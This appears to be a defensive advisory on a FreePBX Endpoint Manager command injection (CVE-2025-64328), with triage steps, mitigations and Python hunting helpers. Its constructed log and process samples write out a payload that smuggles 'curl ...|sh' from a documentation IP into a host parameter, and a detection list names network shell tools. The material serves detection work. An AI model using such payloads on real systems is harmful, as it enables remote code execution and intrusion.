
2026-02-03 — Sangoma FreePBX Endpoint Manager OS command injection (CVE-2025-64328)

Signal: Added to CISA KEV on 2026-02-03.

Impact (per CISA): Post-authentication OS command injection in FreePBX Endpoint Manager (testconnectioncheck_ssh_connect()), potentially enabling remote access as the asterisk user.

Vendor/Product: Sangoma FreePBX (Endpoint Manager)

Why this matters

FreePBX is commonly deployed in sensitive environments (telephony/VoIP) and often ends up:

- reachable from broad networks
- integrated with other business systems

A KEV listing means CISA has evidence of in-the-wild exploitation. Because the flaw is post-authentication, treat as urgent any deployment whose admin UI is reachable from untrusted networks or whose admin credentials are shared, weak, or widely held.

Triage (15–30 minutes)

  1. Find instances
     - Inventory FreePBX systems and identify whether Endpoint Manager is installed/enabled.

  2. Confirm exposure / access paths
     - Is the admin interface reachable from the internet or untrusted networks?
     - Identify who has credentials / access to the affected functionality.

  3. Preserve evidence (if you can do it without delaying patching)
     - Capture web server logs, FreePBX logs, auth logs, and process history.
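The first triage step, as an added example that is not Sangoma/FreePBX code: it parses the module table printed by `fwconsole ma list` on a FreePBX host and classifies the Endpoint Manager module by install state, enablement, and version. The sample table below is constructed and its column layout (Module | Version | Status | License) is assumed; the fixed version is a placeholder the operator must take from Sangoma's advisory, since this page does not state one.

```python
"""Triage helper for CVE-2025-64328: is Endpoint Manager installed, enabled,
and below the version the operator has confirmed as fixed?
Added example, not FreePBX/Sangoma code."""
import re
import subprocess

# Constructed sample of `fwconsole ma list` output. The table layout
# (Module | Version | Status | License) is an assumption about the CLI's format.
SAMPLE_MA_LIST = """\
+---------------+-----------+----------+------------+
| Module        | Version   | Status   | License    |
+---------------+-----------+----------+------------+
| core          | 17.0.3.15 | Enabled  | GPLv3+     |
| endpoint      | 17.0.2.40 | Enabled  | Commercial |
| sysadmin      | 17.0.1.9  | Disabled | Commercial |
+---------------+-----------+----------+------------+
"""


def parse_ma_list(text):
    """Return {module_name: (version, status)} from the pipe-delimited table."""
    modules = {}
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # border rows
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] == "Module":
            continue  # header row
        modules[cells[0]] = (cells[1], cells[2])
    return modules


def version_tuple(v):
    """'17.0.2.40' -> (17, 0, 2, 40) so versions compare numerically."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def triage_endpoint(modules, fixed_version):
    """Classify the host. fixed_version is a placeholder: take the real value
    from Sangoma's guidance for CVE-2025-64328."""
    if "endpoint" not in modules:
        return "not-installed"
    version, status = modules["endpoint"]
    outdated = version_tuple(version) < version_tuple(fixed_version)
    if status.lower() != "enabled":
        return "installed-disabled-outdated" if outdated else "installed-disabled-patched"
    return "enabled-vulnerable" if outdated else "enabled-patched"


def live_ma_list():
    """Run the real command on a FreePBX host (run as root or the asterisk user)."""
    return subprocess.run(["fwconsole", "ma", "list"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Offline demo on the constructed sample; swap in live_ma_list() on a real host.
    # "17.0.2.41" is only a placeholder fixed version for the demo.
    print(triage_endpoint(parse_ma_list(SAMPLE_MA_LIST), "17.0.2.41"))
```

A module reported as Disabled still has its code on disk, so treat "installed-disabled-outdated" as needing the update too, not as safe.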

Mitigation (do now)

  1. Apply vendor mitigations/patches
     - Follow Sangoma/FreePBX guidance associated with CVE-2025-64328.

  2. Restrict admin access
     - Lock down admin UI to VPN/allowlists.
     - Enforce MFA where available.

  3. Reduce blast radius
     - Ensure services run with least privilege.
     - Limit outbound network access from the FreePBX host.

  4. Credential hygiene
     - Rotate admin passwords and any SIP/provider/API credentials stored on the system.

Hunt / detection ideas

Look for indicators consistent with command injection:

- Unusual parameters hitting Endpoint Manager testconnection routes
- Unexpected child processes spawned by the web/PHP context
- Outbound connections from the FreePBX host to unfamiliar IPs
- New files dropped in writable web directories, cron jobs, or startup scripts

Web access logs record only the request line, so parameters sent in a POST body will not appear there; pair the log review with process-ancestry and filesystem checks rather than relying on the log alone.
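The first two hunt ideas, as an added example that is not FreePBX/Sangoma code: one function scans Apache-format access log lines for Endpoint Manager AJAX requests whose parameters carry shell metacharacters, and another walks `ps -eo pid,ppid,user,comm,args` output to find shells and download tools descended from the web server. Both the log lines and the process table are constructed samples. FreePBX modules are reached through `/admin/ajax.php?module=<name>&command=<cmd>`; the `command=testconnection` and `host=` names used in the sample are assumptions about the affected route, not values taken from this page.

```python
"""Hunt helpers for CVE-2025-64328 on a FreePBX host. Added example; not
Sangoma/FreePBX code. Route and parameter names in the samples are assumed."""
import re
from urllib.parse import parse_qs, urlsplit

# --- 1. Web access log review -------------------------------------------------
# Apache combined format: ip ident user [ts] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Characters that have no business in a host, user or port handed to an SSH test.
META = re.compile(r'[;|&`$<>]')

# Constructed sample lines (command/parameter names assumed, see lead-in).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Feb/2026:10:14:02 +0000] "GET /admin/ajax.php?module=endpoint&command=testconnection&host=10.0.0.5 HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Feb/2026:10:15:44 +0000] "GET /admin/ajax.php?module=endpoint&command=testconnection&host=10.0.0.5%3Bcurl%20http%3A%2F%2F198.51.100.9%2Fx%7Csh HTTP/1.1" 200 512',
    '198.51.100.2 - - [03/Feb/2026:10:16:01 +0000] "GET /admin/ajax.php?module=core&command=foo&x=a%3Bb HTTP/1.1" 403 -',
]


def is_endpoint_request(path):
    """True for FreePBX admin AJAX calls addressed to the endpoint module."""
    parts = urlsplit(path)
    return (parts.path.endswith("/admin/ajax.php")
            and parse_qs(parts.query).get("module", [""])[0] == "endpoint")


def suspicious_params(path):
    """(name, decoded value) for each query parameter containing a metacharacter.
    parse_qs percent-decodes once, so %3B is inspected as ';'."""
    return [(k, v) for k, vals in parse_qs(urlsplit(path).query).items()
            for v in vals if META.search(v)]


def hunt_access_log(lines):
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_endpoint_request(m["path"]):
            hits = suspicious_params(m["path"])
            if hits:
                findings.append({"ip": m["ip"], "ts": m["ts"],
                                 "status": m["status"], "params": hits})
    return findings


# --- 2. Process ancestry: shells/tools spawned under the web server -----------
WEB_PARENTS = {"httpd", "apache2", "php-fpm", "nginx"}
SUSPECT_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat", "socat",
                    "python3", "perl"}

# Constructed `ps -eo pid,ppid,user,comm,args` snapshot; the web server running
# as the asterisk user matches the impact statement above.
PS_SAMPLE = """\
  PID  PPID USER     COMM            ARGS
 1201     1 root     httpd           /usr/sbin/httpd -DFOREGROUND
 1410  1201 asterisk httpd           /usr/sbin/httpd -DFOREGROUND
 2233  1410 asterisk sh              sh -c curl http://198.51.100.9/x|sh
 2240  2233 asterisk curl            curl http://198.51.100.9/x
 2301     1 asterisk asterisk        /usr/sbin/asterisk -f
"""


def parse_ps(text):
    """{pid: {ppid, user, comm, args}} from the ps table (header skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 4:
            continue
        pid, ppid, user, comm = parts[:4]
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "comm": comm,
                           "args": parts[4] if len(parts) == 5 else ""}
    return procs


def web_spawned(procs):
    """(pid, user, args) for suspect processes with a web server ancestor."""
    findings = []
    for pid, p in procs.items():
        if p["comm"] not in SUSPECT_CHILDREN:
            continue
        ancestor = p["ppid"]
        while ancestor in procs:  # walk up until we leave the table (init)
            if procs[ancestor]["comm"] in WEB_PARENTS:
                findings.append((pid, p["user"], p["args"]))
                break
            ancestor = procs[ancestor]["ppid"]
    return findings


if __name__ == "__main__":
    for f in hunt_access_log(SAMPLE_LOG):
        print("log:", f)
    for f in web_spawned(parse_ps(PS_SAMPLE)):
        print("proc:", f)
```

The log check only sees GET query strings, so a hit there is strong evidence but a miss proves nothing; the process check catches post-exploitation activity regardless of how the payload was delivered, and the same ancestry walk can be pointed at auditd or EDR process-creation records.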
